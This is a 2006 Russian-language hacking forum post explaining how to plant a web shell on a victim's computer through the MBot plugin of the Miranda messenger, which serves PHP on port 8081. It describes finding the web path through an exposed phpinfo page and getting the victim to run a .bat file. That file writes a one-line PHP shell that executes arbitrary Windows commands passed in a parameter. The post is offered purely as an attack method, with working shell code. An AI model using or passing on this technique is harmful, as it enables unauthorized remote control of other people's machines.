01.12.2006, 23:38
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Получение шелла через MBot
Получение шелла через MBot
Теория
MBot - сервисный плагин Миранды, позволяющий писать скрипты на PHP как плагины для Миранды. Он включает веб сервер на 8081 порту. В WWW каталоге размещаеться только 1 файл index.php с результатом работы phpinfo(). Толку нам от него мало. Вот если бы можно было писать в файл...
Практика
Получаеться когда включаеться Миранда, одновременно запускаеться веб-сервер. Если юзер об этом не знает можно попробовать получить веб-шелл на тачке.
Просмотрев файл index.php через браузер можно узнать путь к скрипту. Например D:/Miranda/MBot/WWW/index.php
Теперь нужно заставить жертву создать файл, который будет содержать шелл
Я сделал такой .bat файл
Код:
echo "<?='<pre>'.convert_cyr_string(htmlspecialchars(`$cmd`),'d','w').'</pre>'?>" > D:/Miranda/MBot/WWW/test.php
После запуска этого файла на удаллённом компе в веб-директории будет шелл, через который мы сможем выплонять команды винды. Он будет работать пока включена Миранда.
|
|
|